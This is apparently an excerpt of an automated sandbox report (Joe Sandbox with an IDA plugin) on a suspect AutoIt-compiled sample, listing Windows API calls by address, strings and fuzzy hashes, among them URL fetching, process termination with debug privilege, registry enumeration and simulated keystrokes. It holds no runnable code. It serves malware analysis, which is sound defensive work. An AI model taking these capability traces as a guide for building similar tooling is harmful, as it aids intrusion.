                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 711023334-1403004172
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00F143FC
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00F143FF
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00F14426
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F14449
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00F144C1
                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00F1450B
                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00F14526
                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00F14541
                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00F14555
                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00F14572
                                              Similarity
                                              • API ID: MessageSend$LongWindow
                                              • String ID:
                                              • API String ID: 312131281-0
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EFCBCF
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EFCBF7
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00EFCC27
                                              • GetLastError.KERNEL32 ref: 00EFCC7F
                                              • SetEvent.KERNEL32(?), ref: 00EFCC93
                                              • InternetCloseHandle.WININET(00000000), ref: 00EFCC9E
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00EC5437,?,?,Bad directive syntax error,00F1DCD0,00000000,00000010,?,?), ref: 00EEA14B
                                              • LoadStringW.USER32(00000000,?,00EC5437,?), ref: 00EEA152
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00EEA216
                                              Similarity
                                              • API ID: HandleLoadMessageModuleString_wcslen
                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                              • API String ID: 858772685-4153970271
                                              APIs
                                              • GetParent.USER32 ref: 00EE293B
                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00EE2950
                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00EE29DD
                                              Similarity
                                              • API ID: ClassMessageNameParentSend
                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                              • API String ID: 1290815626-3381328864
                                              APIs
                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EFCADF
                                              • GetLastError.KERNEL32 ref: 00EFCAF2
                                              • SetEvent.KERNEL32(?), ref: 00EFCB06
                                                • Part of subcall function 00EFCBB0: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00EFCBCF
                                                • Part of subcall function 00EFCBB0: GetLastError.KERNEL32 ref: 00EFCC7F
                                                • Part of subcall function 00EFCBB0: SetEvent.KERNEL32(?), ref: 00EFCC93
                                                • Part of subcall function 00EFCBB0: InternetCloseHandle.WININET(00000000), ref: 00EFCC9E
                                              Similarity
                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                              • String ID:
                                              • API String ID: 337547030-0
                                              APIs
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E4D
                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00EE2E6B
                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00EE2E6F
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E79
                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00EE2E91
                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00EE2E95
                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00EE2E9F
                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00EE2EB3
                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00EE2EB7
                                              Similarity
                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                              • String ID:
                                              • API String ID: 2014098862-0
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE209C
                                              • HeapAlloc.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20A3
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EE1CD9,?,?,00000000), ref: 00EE20B8
                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20C0
                                              • DuplicateHandle.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20C3
                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00EE1CD9,?,?,00000000), ref: 00EE20D3
                                              • GetCurrentProcess.KERNEL32(00EE1CD9,00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20DB
                                              • DuplicateHandle.KERNEL32(00000000,?,00EE1CD9,?,?,00000000), ref: 00EE20DE
                                              • CreateThread.KERNEL32(00000000,00000000,00EE2104,00000000,00000000,00000000), ref: 00EE20F8
                                              Similarity
                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                              • String ID:
                                              • API String ID: 1957940570-0
                                              APIs
                                                • Part of subcall function 00EEDC9C: CreateToolhelp32Snapshot.KERNEL32 ref: 00EEDCC1
                                                • Part of subcall function 00EEDC9C: Process32FirstW.KERNEL32(00000000,?), ref: 00EEDCCF
                                                • Part of subcall function 00EEDC9C: CloseHandle.KERNELBASE(00000000), ref: 00EEDD9C
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0AACC
                                              • GetLastError.KERNEL32 ref: 00F0AADF
                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F0AB12
                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F0ABC7
                                              • GetLastError.KERNEL32(00000000), ref: 00F0ABD2
                                              • CloseHandle.KERNEL32(00000000), ref: 00F0AC23
                                              Similarity
                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                              • String ID: SeDebugPrivilege
                                              • API String ID: 2533919879-2896544425
                                              APIs
                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F14284
                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00F14299
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F142B3
                                              • _wcslen.LIBCMT ref: 00F142F8
                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00F14325
                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F14353
                                              Similarity
                                              • API ID: MessageSend$Window_wcslen
                                              • String ID: SysListView32
                                              • API String ID: 2147712094-78025650
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00EEC5D9
                                              • IsMenu.USER32(00000000), ref: 00EEC5F9
                                              • CreatePopupMenu.USER32 ref: 00EEC62F
                                              • GetMenuItemCount.USER32(01116050), ref: 00EEC680
                                              • InsertMenuItemW.USER32(01116050,?,00000001,00000030), ref: 00EEC6A8
                                              Similarity
                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                              • String ID: 0$2
                                              • API String ID: 93392585-3793063076
                                              APIs
                                              Similarity
                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                              • String ID: 0.0.0.0
                                              • API String ID: 642191829-3771769585
                                              • Opcode ID: 918c86c24d47d3e856ffc7b43e6fb7f32cb199c0db28f77b90da4c85e8ac7c38
                                              • Instruction ID: 3d4931ba6777366eaaa372289e0ba1d299b353156c8c068b74579b6ac436e680
                                              • Opcode Fuzzy Hash: 918c86c24d47d3e856ffc7b43e6fb7f32cb199c0db28f77b90da4c85e8ac7c38
                                              • Instruction Fuzzy Hash: 54113371900219ABDB246B319C4AEEE37BCDF45320F111169F545B61D1EFB0DA80EA50
                                              APIs
                                              Strings
                                              Similarity
                                              • API ID: Variant$ClearInit
                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                              • API String ID: 2610073882-625585964
                                              • Opcode ID: 75246de47813d3c059997032af753e92c67a726462ee1cdba4f0a7ccbe1382a8
                                              • Instruction ID: 585ee272ae237e4e8a033c822c411ef6b7497c00f93fe427cdd238c7fb009151
                                              • Opcode Fuzzy Hash: 75246de47813d3c059997032af753e92c67a726462ee1cdba4f0a7ccbe1382a8
                                              • Instruction Fuzzy Hash: 71917371E0061AABDF20CFA4C844FAF7BB8EF45724F108559F515AB280D7B0A945EFA0
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00F042C8
                                              • CharUpperBuffW.USER32(?,?), ref: 00F043D7
                                              • _wcslen.LIBCMT ref: 00F043E7
                                              • VariantClear.OLEAUT32(?), ref: 00F0457C
                                                • Part of subcall function 00EF15B3: VariantInit.OLEAUT32(00000000), ref: 00EF15F3
                                                • Part of subcall function 00EF15B3: VariantCopy.OLEAUT32(?,?), ref: 00EF15FC
                                                • Part of subcall function 00EF15B3: VariantClear.OLEAUT32(?), ref: 00EF1608
                                              Strings
                                              Similarity
                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                              • API String ID: 4137639002-1221869570
                                              • Opcode ID: 1331cbee751afb575d0262c4a3653d4e9fac1373a0a4aa4f6203dd5cd26c5c19
                                              • Instruction ID: e8c4b7125ee300056b49dd2b57ea8f51ca17aad4d0c8f59d45444a7f1c077d7d
                                              • Opcode Fuzzy Hash: 1331cbee751afb575d0262c4a3653d4e9fac1373a0a4aa4f6203dd5cd26c5c19
                                              • Instruction Fuzzy Hash: E4918DB5A043059FC714EF24C98096AB7E5FF88314F14882DF9899B391DB30ED06EB92
                                              APIs
                                              • GetMenu.USER32(?), ref: 00F12AE2
                                              • GetMenuItemCount.USER32(00000000), ref: 00F12B14
                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F12B3C
                                              • _wcslen.LIBCMT ref: 00F12B72
                                              • GetMenuItemID.USER32(?,?), ref: 00F12BAC
                                              • GetSubMenu.USER32(?,?), ref: 00F12BBA
                                                • Part of subcall function 00EE42CC: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE42E6
                                                • Part of subcall function 00EE42CC: GetCurrentThreadId.KERNEL32 ref: 00EE42ED
                                                • Part of subcall function 00EE42CC: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00EE2E43), ref: 00EE42F4
                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00F12C42
                                                • Part of subcall function 00EEF1A7: Sleep.KERNEL32 ref: 00EEF21F
                                              Similarity
                                              • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                              • String ID:
                                              • API String ID: 4196846111-0
                                              • Opcode ID: 4897a2a9e7878e50d9a275c7d1408e0a9934bcd284338a032cf3363f0216de56
                                              • Instruction ID: d473aaff33dd89c3385f2c09212811d1db4d91d72ede224bd0954eead110e8e8
                                              • Opcode Fuzzy Hash: 4897a2a9e7878e50d9a275c7d1408e0a9934bcd284338a032cf3363f0216de56
                                              • Instruction Fuzzy Hash: CC71A175E00205AFCB54EFA4C845AEEB7F1EF49320F148458E91AEB351DB34EE819B90
                                              APIs
                                              • IsWindow.USER32(00000000), ref: 00F18896
                                              • IsWindowEnabled.USER32(00000000), ref: 00F188A2
                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00F1897D
                                              • SendMessageW.USER32(00000000,000000B0,?,?), ref: 00F189B0
                                              • IsDlgButtonChecked.USER32(?,00000000), ref: 00F189E8
                                              • GetWindowLongW.USER32(00000000,000000EC), ref: 00F18A0A
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00F18A22
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: c94f19877d14bdb3de45957f2ab1b615b9804d4bcf113aedfbe044629fc9674f
                                              • Instruction ID: ec702dd8ff23e096447f44e802e164e4bf421b9f8ca22423ff4a6880ee5f7ef9
                                              • Opcode Fuzzy Hash: c94f19877d14bdb3de45957f2ab1b615b9804d4bcf113aedfbe044629fc9674f
                                              • Instruction Fuzzy Hash: 9571D134A04209AFEF219F51C984FFA7BB5EF0A7A0F54445AE84553261CB31A982EF11
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE80D1
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00EE80F7
                                              • SysAllocString.OLEAUT32(00000000), ref: 00EE80FA
                                              • SysAllocString.OLEAUT32 ref: 00EE811B
                                              • SysFreeString.OLEAUT32 ref: 00EE8124
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00EE813E
                                              • SysAllocString.OLEAUT32(?), ref: 00EE814C
                                              Similarity
                                              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                              • String ID:
                                              • API String ID: 3761583154-0
                                              • Opcode ID: 3ab0a1f343a1a53697fe59fa11600c8ea997fb82aa75b3dac9ad486d9f727a37
                                              • Instruction ID: f41626078396ce204e324d2fb42eafbbc6ade34e0753828cc2d85df2a90ca303
                                              • Opcode Fuzzy Hash: 3ab0a1f343a1a53697fe59fa11600c8ea997fb82aa75b3dac9ad486d9f727a37
                                              • Instruction Fuzzy Hash: BC218371201218AFEB10DFA9DD88CEA77ECEB493647018125F909DB2A0DA74EC46DB64
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00EF0DAE
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF0DEA
                                              Strings
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 5e046f17c261fff785f7f5b93c2f23a2ffa99d9b3c27f64fa2344645a608a42f
                                              • Instruction ID: 40880e81ff75dbab191e1c5332dfbca6749b77b8cca6d53297029f6f5c74ad21
                                              • Opcode Fuzzy Hash: 5e046f17c261fff785f7f5b93c2f23a2ffa99d9b3c27f64fa2344645a608a42f
                                              • Instruction Fuzzy Hash: 7D215C70500309AFDF209F69DC04ABABBB4AF45724F209E19EEA5E72E1D7709940DB50
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00EF0E82
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00EF0EBD
                                              Strings
                                              Similarity
                                              • API ID: CreateHandlePipe
                                              • String ID: nul
                                              • API String ID: 1424370930-2873401336
                                              • Opcode ID: 872ea8f9ebcb39f5de1d0c942b39d967282daa37af9b81672f64b97fef293bfa
                                              • Instruction ID: d81b27f58ff1b8b8d8d72246dbfa5eced07f3806cceabae0dabb8bc06d3f9de9
                                              • Opcode Fuzzy Hash: 872ea8f9ebcb39f5de1d0c942b39d967282daa37af9b81672f64b97fef293bfa
                                              • Instruction Fuzzy Hash: 2D214F72604309EBDB209F689C04AAAB7E4EF55728F205A19FEB1F32D1D7709940CB60
                                              APIs
                                                • Part of subcall function 00E8771B: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E87759
                                                • Part of subcall function 00E8771B: GetStockObject.GDI32(00000011), ref: 00E8776D
                                                • Part of subcall function 00E8771B: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E87777
                                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F14A71
                                              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F14A7E
                                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F14A89
                                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F14A98
                                              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F14AA4
                                              Strings
                                              Similarity
                                              • API ID: MessageSend$CreateObjectStockWindow
                                              • String ID: Msctls_Progress32
                                              • API String ID: 1025951953-3636473452
                                              • Opcode ID: 1009c73c52ca4162f57cb04ca35626a0d43259d54724534f09d46e4041066207
                                              • Instruction ID: 6623ba044b84e03d39b9e0057e3869edb4f5cebeb78c144b0819cc0f60ffa8c3
                                              • Opcode Fuzzy Hash: 1009c73c52ca4162f57cb04ca35626a0d43259d54724534f09d46e4041066207
                                              • Instruction Fuzzy Hash: E611B6B214021DBEEF119FA4CC81EEB7F9DEF09798F014111BB18A6090C676DC61EBA4
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00EEE23D
                                              • LoadStringW.USER32(00000000), ref: 00EEE244
                                              • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00EEE25A
                                              • LoadStringW.USER32(00000000), ref: 00EEE261
                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00EEE2A5
                                              Strings
                                              • %s (%d) : ==> %s: %s %s, xrefs: 00EEE282
                                              Similarity
                                              • API ID: HandleLoadModuleString$Message
                                              • String ID: %s (%d) : ==> %s: %s %s
                                              • API String ID: 4072794657-3128320259
                                              • Opcode ID: a75fce18080dee59a915ecb54f538563cacc30af18ae729b5bae3fa36e595b12
                                              • Instruction ID: 068ae343f3a5667df45ce276bff581abcbb62cf31019f3be0b6654004a131c5f
                                              • Opcode Fuzzy Hash: a75fce18080dee59a915ecb54f538563cacc30af18ae729b5bae3fa36e595b12
                                              • Instruction Fuzzy Hash: EF0112F690021CBFE711AB949D89EE6777CD708300F015595BB45F2051E6749E849B71
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00F0271D
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F0273E
                                              • WSAGetLastError.WSOCK32 ref: 00F0274F
                                              • htons.WSOCK32(?,?,?,?,?), ref: 00F02838
                                              • inet_ntoa.WSOCK32(?), ref: 00F027E9
                                                • Part of subcall function 00EE4277: _strlen.LIBCMT ref: 00EE4281
                                                • Part of subcall function 00F03B81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00EFF569), ref: 00F03B9D
                                              • _strlen.LIBCMT ref: 00F02892
                                              Similarity
                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3203458085-0
                                              • Opcode ID: e47d986417babe6cff49045183bfbdc539538f5c2d967425585a649c103e61ae
                                              • Instruction ID: 86a8d95da90d9a02274168e71387f60b37f0a743e6bddd13630cca2be79b3bc4
                                              • Opcode Fuzzy Hash: e47d986417babe6cff49045183bfbdc539538f5c2d967425585a649c103e61ae
                                              • Instruction Fuzzy Hash: 9EB10535604300AFC314EF24C889F2A77E5AF85328F54954CF45A5B2E2CB31ED45EBA1
                                              APIs
                                              • __allrem.LIBCMT ref: 00EB044A
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB0466
                                              • __allrem.LIBCMT ref: 00EB047D
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB049B
                                              • __allrem.LIBCMT ref: 00EB04B2
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00EB04D0
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                              • String ID:
                                              • API String ID: 1992179935-0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00EA8669,00EA8669,?,?,?,00EB67DF,00000001,00000001,8BE85006), ref: 00EB65E8
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00EB67DF,00000001,00000001,8BE85006,?,?,?), ref: 00EB666E
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00EB6768
                                              • __freea.LIBCMT ref: 00EB6775
                                                • Part of subcall function 00EB3BB0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00EA6A99,?,0000015D,?,?,?,?,00EA85D0,000000FF,00000000,?,?), ref: 00EB3BE2
                                              • __freea.LIBCMT ref: 00EB677E
                                              • __freea.LIBCMT ref: 00EB67A3
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C629
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F0C684
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C6C9
                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F0C6F8
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0C752
                                              • RegCloseKey.ADVAPI32(?), ref: 00F0C75E
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                              • String ID:
                                              • API String ID: 1120388591-0
                                              APIs
                                              • VariantInit.OLEAUT32(00000035), ref: 00EE0049
                                              • SysAllocString.OLEAUT32(00000000), ref: 00EE00F0
                                              • VariantCopy.OLEAUT32(00EE02F4,00000000), ref: 00EE0119
                                              • VariantClear.OLEAUT32(00EE02F4), ref: 00EE013D
                                              • VariantCopy.OLEAUT32(00EE02F4,00000000), ref: 00EE0141
                                              • VariantClear.OLEAUT32(?), ref: 00EE014B
                                              Similarity
                                              • API ID: Variant$ClearCopy$AllocInitString
                                              • String ID:
                                              • API String ID: 3859894641-0
                                              APIs
                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00EDFB8F,00000000,?,?,00000000,?,00EC39BC,00000004,00000000,00000000), ref: 00F18BAB
                                              • EnableWindow.USER32(?,00000000), ref: 00F18BD1
                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00F18C30
                                              • ShowWindow.USER32(?,00000004), ref: 00F18C44
                                              • EnableWindow.USER32(?,00000001), ref: 00F18C6A
                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00F18C8E
                                              Similarity
                                              • API ID: Window$Show$Enable$MessageSend
                                              • String ID:
                                              • API String ID: 642888154-0
                                              APIs
                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00F02C45
                                                • Part of subcall function 00EFEE49: GetWindowRect.USER32(?,?), ref: 00EFEE61
                                              • GetDesktopWindow.USER32 ref: 00F02C6F
                                              • GetWindowRect.USER32(00000000), ref: 00F02C76
                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00F02CB2
                                              • GetCursorPos.USER32(?), ref: 00F02CDE
                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00F02D3C
                                              Similarity
                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                              • String ID:
                                              • API String ID: 2387181109-0
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • _wcslen.LIBCMT ref: 00EF61D5
                                              • CoInitialize.OLE32(00000000), ref: 00EF62EF
                                              • CoCreateInstance.OLE32(00F20CC4,00000000,00000001,00F20B34,?), ref: 00EF6308
                                              • CoUninitialize.OLE32 ref: 00EF6326
                                              Similarity
                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                              • String ID: .lnk
                                              • API String ID: 3172280962-24824748
                                              APIs
                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EE210F
                                              • UnloadUserProfile.USERENV(?,?), ref: 00EE211B
                                              • CloseHandle.KERNEL32(?), ref: 00EE2124
                                              • CloseHandle.KERNEL32(?), ref: 00EE212C
                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00EE2135
                                              • HeapFree.KERNEL32(00000000), ref: 00EE213C
                                              Similarity
                                              • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                              • String ID:
                                              • API String ID: 146765662-0
                                              APIs
                                                • Part of subcall function 00E84154: _wcslen.LIBCMT ref: 00E84159
                                              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EECEAE
                                              • _wcslen.LIBCMT ref: 00EECEF5
                                              • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00EECF5C
                                              • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00EECF8A
                                              Similarity
                                              • API ID: ItemMenu$Info_wcslen$Default
                                              • String ID: 0
                                              • API String ID: 1227352736-4108050209
                                              APIs
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F14794
                                              • IsMenu.USER32(?), ref: 00F147A9
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F147F1
                                              • DrawMenuBar.USER32 ref: 00F14804
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert
                                              • String ID: 0
                                              • API String ID: 3076010158-4108050209
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00EE4536: GetClassNameW.USER32(?,?,000000FF), ref: 00EE4559
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00EE26F6
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00EE2709
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00EE2739
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Similarity
                                              • API ID: MessageSend$_wcslen$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 2081771294-1403004172
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8633E
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E86350
                                              • FreeLibrary.KERNEL32(00000000,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86362
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-3689287502
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86304
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E86316
                                              • FreeLibrary.KERNEL32(00000000,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86329
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-1355242751
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00F0AD86
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F0AD94
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F0ADC7
                                              • CloseHandle.KERNEL32(?), ref: 00F0AF9C
                                              Similarity
                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                              • String ID:
                                              • API String ID: 3488606520-0
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                                • Part of subcall function 00F0D2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F0C00D,?,?), ref: 00F0D314
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D350
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3C7
                                                • Part of subcall function 00F0D2F7: _wcslen.LIBCMT ref: 00F0D3FD
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F0C404
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F0C45F
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F0C4C2
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00F0C505
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0C512
                                              Similarity
